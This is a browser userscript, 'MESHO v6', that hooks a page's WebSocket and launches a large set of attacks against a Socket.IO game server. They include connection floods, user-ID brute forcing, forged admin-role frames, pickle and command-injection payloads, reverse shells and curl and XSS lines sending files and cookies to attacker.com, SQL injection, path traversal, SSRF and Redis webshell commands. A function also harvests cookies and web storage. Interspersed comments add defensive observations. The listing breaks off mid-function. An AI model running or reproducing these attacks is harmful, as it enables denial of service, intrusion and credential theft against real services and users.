MESHO v6

socket attacks


// ==UserScript==
// @name         MESHO v6
// @namespace    http://tampermonkey.net/
// @version      6.9
// @description  socket attacks
// @author       0xMesho
// @match        *://*/*
// @grant        none
// ==/UserScript==

(function(){'use strict';
// Script-wide state. W: the first open WebSocket the page sent on; U: that socket's URL.
// P and R are filled in by hook() from observed messages; H is a log of observed events.
// I and S are declared here but not referenced anywhere else in this listing.
let W,U,P,R,H=[],I=null,S={};
// Defender note: the native WebSocket.prototype.send is replaced for every socket on the page.
// The header declares `@match *://*/*` with `@grant none`, so this patch is applied on every
// site the browser opens, not on one application only. A page can detect the patch
// by checking whether WebSocket.prototype.send is still the native function.
const O=WebSocket.prototype.send;
WebSocket.prototype.send=function(d){
 // On the first send() made on a socket in the OPEN state (readyState 1), remember that socket
 // and its URL, then write the literal frame '2' on it every 20 s (2e4 ms) while it stays open.
 if(!W&&this.readyState===1){W=this;U=this.url;setInterval(()=>{W&&W.readyState===1&&W.send('2')},2e4)}
 // The page's own data is passed through to the native send unchanged.
 return O.call(this,d)};

// Classifies one text frame received on the socket.
// Returns:
//   null                      for non-string input or any frame not recognised below
//   {t:'pong'}                for the literal frame '2'
//   {t:'con'}                 for the literal frame '40'
//   {t:'ev', e, a}            for a frame starting with '42' whose remainder parses as a JSON
//                             array; e is the first element, a the remaining elements
// NOTE(review): these prefixes look like Engine.IO/Socket.IO text framing — confirm against the
// server the socket belongs to.
function pM(d){
 if(typeof d!='string')return null;
 if(d==='2')return{t:'pong'};
 if(d==='40')return{t:'con'};
 // JSON.parse failures are swallowed; the function then falls through to `return null`.
 if(d.startsWith('42'))try{let j=JSON.parse(d.slice(2));if(Array.isArray(j))return{t:'ev',e:j[0],a:j.slice(1)}}catch(e){}
 return null}

// Writes frame d on the captured socket W when it is open; does nothing otherwise.
// The expression evaluates to false on both paths (send() returns undefined, so !!undefined is
// false); no caller in this listing reads the return value.
function s(d){return W&&W.readyState===1?!!W.send(d):!1}

// Returns the numeric identifier harvested by hook(): P if set, else R.id, else null.
function gP(){return P||R?.id||null}

// Attaches a passive 'message' listener to the captured socket and harvests identifiers from
// the traffic the server sends to this client.
// Defender note: nothing here requires extra privileges; every value it records is one the
// server already delivered to the browser. Identifiers that must not be usable by another
// client should not be the only thing an action is authorised on.
function hook(){
 // No socket captured yet: poll again in 500 ms.
 if(!W)return setTimeout(hook,500);
 W.addEventListener('message',function(e){
  // Binary frames are ignored.
  if(typeof e.data!='string')return;
  let m=pM(e.data);
  // Only '42'-prefixed event frames are processed.
  if(!m||m.t!='ev')return;
  let[eId,...a]=[m.e,...m.a];
  // Event id 5 with at least three arguments: store the second argument in P and keep the
  // arguments in R as {l, id, c, x}. NOTE(review): the meaning of these fields is not visible
  // in this listing; other functions interpolate R.l and R.c into frames they build.
  if(eId===5&&a.length>=3){P=a[1];R={l:a[0],id:a[1],c:a[2],x:a.slice(3)};return}
  // Otherwise, if the first argument is an object, take the first numeric field greater than
  // 10000 among id, userId, playerId, author, owner, creator as P.
  if(typeof a[0]=='object'&&a[0]!==null){
   if(a[0].id&&typeof a[0].id=='number'&&a[0].id>1e4){P=a[0].id;return}
   for(let k of['userId','playerId','author','owner','creator']){
    if(a[0][k]&&typeof a[0][k]=='number'&&a[0][k]>1e4){P=a[0][k];return}}}
  // Every other event is appended to H with a timestamp; H is never trimmed.
  H.push({t:Date.now(),e:eId,d:a})})}

// Returns a string of at least 99,999 characters built from base-36 renderings of
// Math.random(), each repeated 100 times. Callers slice it to the length they want.
function f(){let r='';while(r.length<99999)r+=Math.random().toString(36).repeat(100);return r}

function zd1(){
 let p=gP()||1;
 for(let b=0;b<100;b++)for(let i=0;i<100;i++)setTimeout(()=>{
  s(`42[10,${p},${JSON.stringify(Array(99999).fill().map((_,j)=>({_placeholder:true,num:j})))}]`);
  let d2=btoa('{"a":'.repeat(5000)+'"x"'+'}'.repeat(5000));
  s(`42[10,${p},["${d2}"]]`);
  for(let e=0;e<200;e++)s(`42[${e},${p},"null"]`)},b*2)}

function zd2(){
 for(let i=0;i<2000;i++)setTimeout(()=>{
  try{
   for(let j=0;j<10;j++){
    let w=new WebSocket(U),ta=new Uint8Array(65535);
    w.onopen=()=>{w.send('40');w.close(1000,ta)};
    let w2=new WebSocket(U);
    w2.onopen=()=>{w2.send(`42[10,${gP()||1},["${'A'.repeat(65535)}"]]`);w2.close()}}
  }catch(e){}},i*1);
 setInterval(()=>{try{let w=new WebSocket(U);w.onopen=()=>{w.send('2');w.send('2');w.send('2')}}catch(e){}},1)}

function zd3(){
 let p=gP();if(!p)return;
 for(let i=0;i<1000;i++)setTimeout(()=>{
  try{
   let w=new WebSocket(U);
   w.onopen=()=>{
    w.send('40');
    setTimeout(()=>{
     if(R){
      w.send(`42[5,"${R.l}",${p},"${R.c}"]`);
      w.send(`42[5,"${R.l}",${p},"${R.c}","admin",{"drawLevel":999,"owner":true,"mod":true}]`);
      for(let i=0;i<100;i++)w.send(`42[3,${p},["${R.c}","clone","${'A'.repeat(500)}"]]`)}
    },100)};
   w.onmessage=(e)=>{
    if(typeof e.data=='string'){
     let m=pM(e.data);
     if(m&&m.t=='ev'){
      if(m.a[0]?.id>1e4)P=m.a[0].id;
      if(m.e===2||m.e===3||m.e===33)try{let d=JSON.parse(e.data.slice(2));localStorage.setItem('mh_'+Date.now(),JSON.stringify(d))}catch(e){}}}}
  }catch(e){}},i*1);
 for(let pp=p-5000;pp<=p+5000;pp+=5){let x=pp;setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>{w.send('40');setTimeout(()=>{
   w.send(`42[5,"x",${x},"0"]`)},50)}}catch(e){}},0)}
 setInterval(()=>{for(let q=0;q=100;q++)try{new WebSocket(U)}catch(e){}},100)}

function zd4(){
 let p=gP()||1;
 for(let t=0;t<=255;t++)s(String.fromCharCode(t)+f().slice(0,1000));
 for(let i=0;i<2000;i++)setTimeout(()=>{
  s('0'+f());s('1'+f());s('4'+'\x00\x01\x02'.repeat(5000));
  s('4null');s('4[');s('4{"x":');s('4test:42["e",{}]');
  s('40{"sid":"'+f().slice(0,5000)+'"}');
  s('40{"sid":null,"upgrades":["'.repeat(100)+'"]}');
  s('42["error",{"message":"'+f().slice(0,50000)+'"}]');
  s('40{"pingTimeout":-1,"pingInterval":-1}');
  s('3{"data":"'+f().slice(0,50000)+'"}')},i*1)}

function zd5(cmd){
 cmd=cmd||'cat /etc/passwd;id;whoami;ls -la;uname -a';
 let p=gP()||1;
 ['cos\nsystem\n','csubprocess\ncheck_output\n',"cbuiltins\neval\n","cos\npopen\n","csubprocess\nPopen\n"].forEach((m,i)=>setTimeout(()=>{
  let pl=btoa(m+"(S'"+cmd+"'\ntR.");
  s(`42[10,${p},["${pl}"]]`);s(`42["pickle","${pl}"]`);s(`42["message","${pl}"]`);
  s(`42["rce","${pl}"]`);s(`42["exec","${pl}"]`)},i*100));
 ['/admin','/debug','/internal','/redis','/queue','/pubsub','/shell','/exec','/cmd','/eval','/console','/terminal','/bash','/sh','/system','/os','/process','/spawn','/fork','/sandbox','/vm','/api/v1/exec','/api/v1/cmd','/api/v1/shell','/api/v1/debug','/api/v1/admin','/api/v1/internal','/api/v1/redis','/api/v1/queue','/api/v1/pubsub','/api/v1/shell','/api/v1/exec','/api/v1/cmd','/api/v1/eval','/api/v1/console','/api/v1/terminal','/api/v1/bash','/api/v1/sh','/api/v1/system','/api/v1/os','/api/v1/process','/api/v1/spawn','/api/v1/fork','/api/v1/sandbox','/api/v1/vm'].forEach((ns,i)=>setTimeout(()=>{
  let pl=btoa("cos\nsystem\n(S'curl http://attacker.com/$(cat /flag /etc/passwd 2>/dev/null | base64 -w0)'\ntR.");
  s(`40${ns}`);setTimeout(()=>{s(`42${ns}["message","${pl}"]`);s(`42${ns}["publish","${pl}"]`);
   s(`42${ns}["exec","${pl}"]`);s(`42${ns}["eval","${pl}"]`);s(`42${ns}["rce","${pl}"]`)},100)},i*100+3e3))}

function zd6(){
 for(let i=0;i<500;i++)setTimeout(()=>{
  try{
   for(let j=0;j<5;j++){
    let f=document.createElement('iframe');f.style.display='none';f.src='about:blank';
    document.body.appendChild(f);
    let w=new f.contentWindow.WebSocket(U);
    w.onopen=()=>{w.send(`42[10,${gP()||1},["uaf"]]`);
     setTimeout(()=>{try{document.body.removeChild(f);w.send(`42[10,${gP()||1},["${f().slice(0,5000)}"]]`)}catch(e){}},1)}}
  }catch(e){}},i*10)}

function zd7(){
 let p=gP()||1,r=R?.c||'0';
 for(let e=0;e<=255;e++){s(`42[${e},${p},"${r}"]`);s(`42[${e},${p},{}]`);s(`42[${e},${p},["t"]]`);s(`42[${e},${p},["${f().slice(0,1000)}"]]`)}
 setTimeout(()=>{
  ['/admin','/op '+p,'/sudo '+p,'${7*7}','{{7*7}}','<%=7*7%>','<script>alert(1)</script>','{{constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()}}','${require("child_process").execSync("id")}','<%= system("id") %>','#{system("id")}','${{system("id")}}'].forEach(c=>s(`42[50,${p},"${c}"]`));
  [`42[5,"mod",${p},"${r}","admin"]`,`42[5,"mod",${p},"${r}",{"admin":true,"drawLevel":999,"owner":true,"mod":true,"superuser":true,"root":true,"god":true}]`,`42[33,${p},"${r}",{"owner":true,"admin":true,"drawLevel":999}]`,`42[33,${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[40,${p},"${r}",{"all":true}]`,`42[43,${p},"${r}",{"all":true}]`,`42[50,${p},"${r}","admin:true","owner:true","drawLevel:999"]`,`42[5,"mod",${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[5,"owner",${p},"${r}"]`,`42[5,"transfer",${p},"${r}",${p}]`].forEach(x=>s(x))},2e3)}

// Reads the browser-side session data of the page the script runs on and writes it into
// event-50 frames on newly opened sockets to U.
// Defender notes:
//  - The data transmitted belongs to whoever has the script installed: document.cookie,
//    the full localStorage and sessionStorage, and the bodies returned by /api/user,
//    /api/config and /api/admin on the current hostname. Where the server relays event 50
//    is not visible in this listing.
//  - Cookies set with HttpOnly are not readable through document.cookie, so keeping session
//    cookies HttpOnly and keeping tokens out of web storage limits what code like this can read.
//  - On the server side this shows up as up to 1000 connections (500 iterations, two sockets
//    each) opened by one client in a single synchronous loop; per-client connection limits
//    and a maximum frame size bound the effect.
function zd8(){
 for(let i=0;i<500;i++)try{
  // First socket: raw cookie string plus JSON of both storage areas. Second: base64 of the cookie string.
  let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${document.cookie}${localStorage?JSON.stringify(localStorage):''}${sessionStorage?JSON.stringify(sessionStorage):''}"]`);
  let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${gP()||1},"${btoa(document.cookie)}"]`) }catch(e){}
 // Each fetch targets https://<current hostname>/...; the response text is base64-encoded and
 // sent on a fresh socket. Fetch failures are ignored.
 // NOTE(review): presumably sent with the page's ambient credentials when same-origin — confirm.
 fetch('https://'+window.location.hostname+'/api/user').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/config').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/admin').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{})}

function pp(){let p=gP()||1;
 s(`42[10,${p},[{"__proto__":{"polluted":true,"admin":true,"owner":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true,"bypass":true,"verified":true,"premium":true,"vip":true,"unlimited":true,"infinite":true,"all":true,"everyone":true,"self":true,"other":true,"any":true,"allUsers":true,"allRooms":true,"allDrawings":true,"allChats":true,"allMessages":true,"allData":true,"allAccess":true,"fullAccess":true,"completeAccess":true,"totalAccess":true,"absoluteAccess":true,"unrestrictedAccess":true,"unlimitedAccess":true,"infiniteAccess":true,"endlessAccess":true,"permanentAccess":true,"eternalAccess":true,"foreverAccess":true,"alwaysAccess":true,"neverExpire":true,"neverEnd":true,"neverStop":true,"neverDie":true,"immortal":true,"invincible":true,"indestructible":true,"unbreakable":true,"unhackable":true,"unpenetrable":true,"unreachable":true,"unstoppable":true,"unkillable":true,"undestroyable":true,"unremovable":true,"undeletable":true,"uneraseable":true,"unwipeable":true,"uncleanable":true,"unpurgeable":true,"unbanable":true,"unkickable":true,"unmuteable":true,"unsilenceable":true,"ungagable":true,"unrestrictable":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true,"unban":true,"unmute":true,"unsilence":true,"ungag":true,"unrestrict":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true}}]]`);
 setTimeout(()=>{try{console.log('[PP] proto polluted:',({}).polluted===true,({}).admin===true)}catch(e){}},500)}

function rce(c){c=c||'curl http://attacker.com/$(cat /flag /etc/passwd /etc/shadow /root/.ssh/id_rsa 2>/dev/null | base64 -w0)';
 ['exec','eval','system','spawn','cmd','run','execSync','execFile','spawnSync','fork','execCommand','execScript','shell','bash','sh','zsh','fish','powershell','cmd','command','runCommand','execute','runSync','execSync','execFileSync','spawnSync','forkSync'].forEach(ev=>{
  s(`42["${ev}","${c}"]`);s(`42["${ev}",{"cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}","cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}"}]`);
  s(`42["${ev}",{"data":"${c}"}]`);s(`42["${ev}",{"input":"${c}"}]`);s(`42["${ev}",{"payload":"${c}"}]`);s(`42["${ev}",{"code":"${c}"}]`);s(`42["${ev}",{"script":"${c}"}]`);s(`42["${ev}",{"command":"${c}"}]`)});
 s(`42[10,${gP()||1},[{"name":"\${require('child_process').execSync('${c}').toString()}","__proto__":{"type":"Function","body":"return process.mainModule.require('child_process').execSync('${c}').toString()"}}]]`);
 s(`42[10,${gP()||1},[{"constructor":{"prototype":{"NODE_OPTIONS":"--require=/proc/self/environ --experimental-modules --experimental-json-modules --experimental-wasm-modules --experimental-top-level-await --experimental-vm-modules --experimental-import-meta-resolve --experimental-network-imports --experimental-specifier-resolution=node --experimental-policy --experimental-wasi-unstable --experimental-wasi --experimental-wasi-unstable-preview1 --experimental-wasi-unstable-preview2"}}}]]`)}

function all(){
 console.log('[MESHO] Launching all...');zd1();
 setTimeout(()=>zd2(),500);setTimeout(()=>zd3(),1000);
 setTimeout(()=>zd4(),1500);setTimeout(()=>zd5(),2000);
 setTimeout(()=>zd6(),2500);setTimeout(()=>zd7(),3000);
 setTimeout(()=>zd8(),3500);setTimeout(()=>pp(),4000);
 setTimeout(()=>rce(),4500);setTimeout(()=>console.log('[MESHO] All 0days deployed'),5000)}

function injectXSS(){let i=document.createElement('script');i.src='https://'+window.location.hostname+'/socket.io/socket.io.js';document.body.appendChild(i);
 setTimeout(()=>{if(window.io){let s=io(window.location.origin);s.emit('message',{type:'exec',cmd:'id'});s.emit('message',{type:'eval',code:'process.mainModule.require("child_process").execSync("id").toString()'})}},1000)}

// Despite the name, this does not read process memory. It enumerates the enumerable
// properties of `window` and `document` in the current page, JSON-serialises each value
// (truncated to 500 characters; values that fail to serialise are skipped), and sends the
// base64-encoded list as one event-50 frame on a new socket to U.
// Defender note: anything an application stores on global objects (tokens, config, user
// records) is readable by any script running in the page context, including this one.
function dumpMemory(){let r=[];
 for(let k in window){try{r.push({key:k,val:JSON.stringify(window[k]).slice(0,500)})}catch(e){}}
 for(let k in document){try{r.push({key:'doc_'+k,val:JSON.stringify(document[k]).slice(0,500)})}catch(e){}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(JSON.stringify(r))}"]`)}catch(e){}}

function protoChain(){let c={};
 for(let i=0;i<100;i++){let n=Object.create(c);n.__proto__['level'+i]={admin:true,owner:true,drawLevel:999};c=n}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${gP()||1},[${JSON.stringify(c)}]]`)}catch(e){}}

function ssrf(){let targets=['http://169.254.169.254/latest/meta-data/','http://169.254.169.254/latest/user-data/','http://metadata.google.internal/computeMetadata/v1/','http://100.100.100.200/latest/meta-data/','http://localhost:6379/','http://localhost:8080/','http://localhost:3000/','http://localhost:5000/','http://localhost:8000/','http://localhost:9000/','http://127.0.0.1:6379/','http://127.0.0.1:8080/','http://127.0.0.1:3000/','http://127.0.0.1:5000/','http://127.0.0.1:8000/','http://127.0.0.1:9000/'];
 targets.forEach((t,i)=>setTimeout(()=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa('fetch '+t)}"]`)}catch(e){}},i*100))}

function sqlI(){let p=gP()||1;
 ["' OR '1'='1","' OR 1=1--","' UNION SELECT 1,2,3,4,5,6,7,8,9,10--","'; DROP TABLE users;--","' UNION SELECT table_name,column_name,data_type FROM information_schema.columns--","' OR SLEEP(5)--","' OR BENCHMARK(10000000,MD5('test'))--"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["query","${pay}"]`)},i*100))}

function xxs(){let p=gP()||1;
 ["<script>fetch('https://attacker.com/'+document.cookie)</script>","<img src=x onerror=fetch('https://attacker.com/'+document.cookie)>","<svg onload=fetch('https://attacker.com/'+document.cookie)>","<body onload=fetch('https://attacker.com/'+document.cookie)>","<input onfocus=fetch('https://attacker.com/'+document.cookie) autofocus>","<details open ontoggle=fetch('https://attacker.com/'+document.cookie)>","<marquee onstart=fetch('https://attacker.com/'+document.cookie)>"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["message","${pay}"]`)},i*100))}

function crlf(){let p=gP()||1;
 ["%0d%0aSet-Cookie:%20malicious=1","%0d%0aContent-Length:%200%0d%0a%0d%0a","%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0a","%0d%0aLocation:%20https://evil.com%0d%0a"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`)},i*100))}

function lfi(){let p=gP()||1;
 ["../../../etc/passwd","../../../../etc/shadow","../../../../root/.ssh/id_rsa","../../../../proc/self/environ","../../../../proc/self/cmdline","../../../../proc/self/fd/0","../../../../proc/self/fd/1","../../../../proc/self/fd/2","../../../../var/log/apache2/access.log","../../../../var/log/nginx/access.log","../../../../var/log/auth.log","../../../../var/log/syslog","../../../../var/log/messages","../../../../var/log/lastlog","../../../../var/log/wtmp","../../../../var/log/btmp","../../../../var/log/secure","../../../../var/log/httpd/access_log","../../../../var/log/httpd/error_log","php://filter/convert.base64-encode/resource=index.php","php://filter/convert.base64-encode/resource=config.php","php://filter/convert.base64-encode/resource=db.php","php://filter/convert.base64-encode/resource=admin.php","php://filter/convert.base64-encode/resource=login.php","php://filter/convert.base64-encode/resource=user.php","php://filter/convert.base64-encode/resource=api.php","php://filter/convert.base64-encode/resource=ws.php","php://filter/convert.base64-encode/resource=server.php","php://filter/convert.base64-encode/resource=app.js","php://filter/convert.base64-encode/resource=server.js","php://filter/convert.base64-encode/resource=config.js","php://filter/convert.base64-encode/resource=db.js","php://filter/convert.base64-encode/resource=admin.js","php://filter/convert.base64-encode/resource=login.js","php://filter/convert.base64-encode/resource=user.js","php://filter/convert.base64-encode/resource=api.js","php://filter/convert.base64-encode/resource=ws.js","file:///etc/passwd","file:///etc/shadow","file:///root/.ssh/id_rsa","expect://id","data://text/plain;base64,aWQ="].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["file","${pay}"]`);s(`42["read","${pay}"]`);s(`42["path","${pay}"]`)},i*50))}

function prototypePollutionDeep(){let p=gP()||1;
 let chain={};let current=chain;
 for(let i=0;i<100;i++){current['__proto__']={};current=current['__proto__'];current['prop'+i]={rce:true,admin:true,owner:true,drawLevel:999,system:true,exec:true,bypass:true,all:true,total:true,full:true,absolute:true,complete:true,unlimited:true,infinite:true,endless:true,permanent:true,eternal:true,forever:true,always:true,immortal:true,invincible:true,indestructible:true,unbreakable:true,unhackable:true,unpenetrable:true,unreachable:true,unstoppable:true,unkillable:true,undestroyable:true,unremovable:true,undeletable:true,uneraseable:true,unwipeable:true,uncleanable:true,unpurgeable:true,unbanable:true,unkickable:true,unmuteable:true,unsilenceable:true,ungagable:true,unrestrictable:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true,unban:true,unmute:true,unsilence:true,ungag:true,unrestrict:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},[${JSON.stringify(chain)}]]`)}catch(e){}}

function wsAuthBypass(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>{w.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w.send(`42[5,"${R?.l||'x'}",${p},"${R?.c||'0'}","admin",{"owner":true,"admin":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true}]`)},100)}}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>{w2.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w2.send(`42[33,${p},"${R?.c||'0'}",{"owner":true,"admin":true,"drawLevel":999}]`)},100)}}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>{w3.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w3.send(`42[40,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}
 try{let w4=new WebSocket(U);w4.onopen=()=>{w4.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w4.send(`42[43,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}}

function wsCommandInjection(){let p=gP()||1;
 [";id","|id","`id`","$(id)","%0aid","%0aid%0a","\nid\n","\r\nid\r\n","&id&","&&id&&","||id",";cat /etc/passwd","|cat /etc/passwd","`cat /etc/passwd`","$(cat /etc/passwd)",";nc -e /bin/sh attacker.com 4444","|nc -e /bin/sh attacker.com 4444","`nc -e /bin/sh attacker.com 4444`","$(nc -e /bin/sh attacker.com 4444)",";python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","|python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","`python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'`","$(python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())')"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["cmd","${pay}"]`);s(`42["exec","${pay}"]`);s(`42["shell","${pay}"]`)},i*50))}

function wsRedisExploit(){let p=gP()||1;
 ["FLUSHALL","CONFIG SET dir /tmp","CONFIG SET dbfilename shell","SET shell '<?php system($_GET[\"cmd\"]);?>'","SAVE","BGSAVE","SLAVEOF attacker.com 6379","CONFIG SET slave-read-only no","EVAL 'os.execute(\"id\")' 0","DEBUG SET-ACTIVE-EXEC on","DEBUG EXEC 'id'","MODULE LOAD /tmp/malicious.so","CLIENT KILL TYPE normal","CLIENT KILL TYPE slave","SHUTDOWN NOSAVE","SHUTDOWN SAVE","DEBUG SEGFAULT","DEBUG CRASH","DEBUG PANIC","DEBUG OOM","DEBUG ASSERT","DEBUG SLEEP 10","DEBUG SET-ACTIVE-EXEC","DEBUG ERROR","DEBUG LOG","DEBUG STRING","DEBUG INTEGER","DEBUG FLOAT","DEBUG DOUBLE","DEBUG BOOLEAN","DEBUG NULL","DEBUG UNDEFINED","DEBUG NAN","DEBUG INFINITY","DEBUG ARRAY","DEBUG OBJECT","DEBUG FUNCTION","DEBUG SYMBOL","DEBUG BIGINT","DEBUG SYMBOL","DEBUG MAP","DEBUG SET","DEBUG WEAKMAP","DEBUG WEAKSET","DEBUG PROMISE","DEBUG PROXY","DEBUG TYPEDARRAY","DEBUG DATAVIEW","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC","DEBUG DATAVIEW","DEBUG TYPEDARRAY","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["redis://localhost:6379/${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w.send(`42[10,${p},["redis://127.0.0.1:6379/${pay}"]]`)}catch(e){}
  try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"redis://localhost:6379/${pay}"]`)}catch(e){}
  try{let w4=new WebSocket(U);w4.onopen=()=>w4.send(`42[50,${p},"redis://127.0.0.1:6379/${pay}"]`)}catch(e){}},i*100))}

function wsMemcachedExploit(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["memcached://localhost:11211/stats items"]]`)}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[10,${p},["memcached://localhost:11211/get key"]]`)}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"memcached://localhost:11211/stats"]`)}catch(e){}}

function wsMongoExploit(){let p=gP()||1;
 ["mongodb://localhost:27017/admin","mongodb://localhost:27017/test","mongodb://localhost:27017/users","mongodb://localhost:27017/config","mongodb://localhost:27017/gartic","mongodb://localhost:27017/gartic_users","mongodb://localhost:27017/gartic_rooms","mongodb://localhost:27017/gartic_drawings","mongodb://localhost:27017/gartic_chats","mongodb://localhost:27017/gartic_messages","mongodb://localhost:27017/gartic_data","mongodb://localhost:27017/gartic_config","mongodb://localhost:27017/gartic_admin"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsMySqlExploit(){let p=gP()||1;
 ["mysql://root@localhost:3306/mysql","mysql://root:root@localhost:3306/mysql","mysql://admin:admin@localhost:3306/mysql","mysql://root@localhost:3306/gartic","mysql://root:root@localhost:3306/gartic","mysql://admin:admin@localhost:3306/gartic","mysql://root@localhost:3306/information_schema","mysql://root:root@localhost:3306/information_schema","mysql://admin:admin@localhost:3306/information_schema"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsPostgresExploit(){let p=gP()||1;
 ["postgres://postgres:postgres@localhost:5432/postgres","postgres://postgres:admin@localhost:5432/postgres","postgres://postgres:password@localhost:5432/postgres","postgres://postgres:postgres@localhost:5432/gartic","postgres://postgres:admin@localhost:5432/gartic","postgres://postgres:password@localhost:5432/gartic"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

// Publishes the script's state and functions as a page global.
// Defender note: a `MESHO` property on `window` and console lines beginning `[MESHO]` are
// directly observable indicators that this script is loaded in a page.
window.MESHO={
 // Read-only views of the captured socket URL, harvested id, stored event-5 record, and socket.
 get url(){return U},get pid(){return gP()},get room(){return R},get ws(){return W},
 // Prints a summary table of the captured state and the number of logged events.
 info(){console.table({URL:U,Status:['C','O','CL','CD'][W?.readyState||3],PID:gP()||'?',Room:R?.c||'?',Resp:H.length})},
 // Prints the last 50 events recorded in H.
 responses(){H.slice(-50).forEach((r,i)=>console.log(`[${i}] E:${r.e}`,r.d))},
 // Logs the first 500 characters of every text frame received on the captured socket.
 monitor(){W?.addEventListener('message',e=>console.log('WS:',typeof e.data=='string'?e.data.slice(0,500):'[bin]'))},
 zd1,zd2,zd3,zd4,zd5,zd6,zd7,zd8,pp,rce,all,injectXSS,dumpMemory,protoChain,ssrf,sqlI,xxs,crlf,lfi,prototypePollutionDeep,wsAuthBypass,wsCommandInjection,wsRedisExploit,wsMemcachedExploit,wsMongoExploit,wsMySqlExploit,wsPostgresExploit,
 // Schedules every exported function once, 100 ms apart, then logs a fixed message at 3 s.
 // The final log line is unconditional; it does not reflect any response from the server.
 unleash(){console.log('[MESHO] UNLEASHING ALL 0DAYS...');
  this.zd1();setTimeout(()=>this.zd2(),100);setTimeout(()=>this.zd3(),200);
  setTimeout(()=>this.zd4(),300);setTimeout(()=>this.zd5(),400);
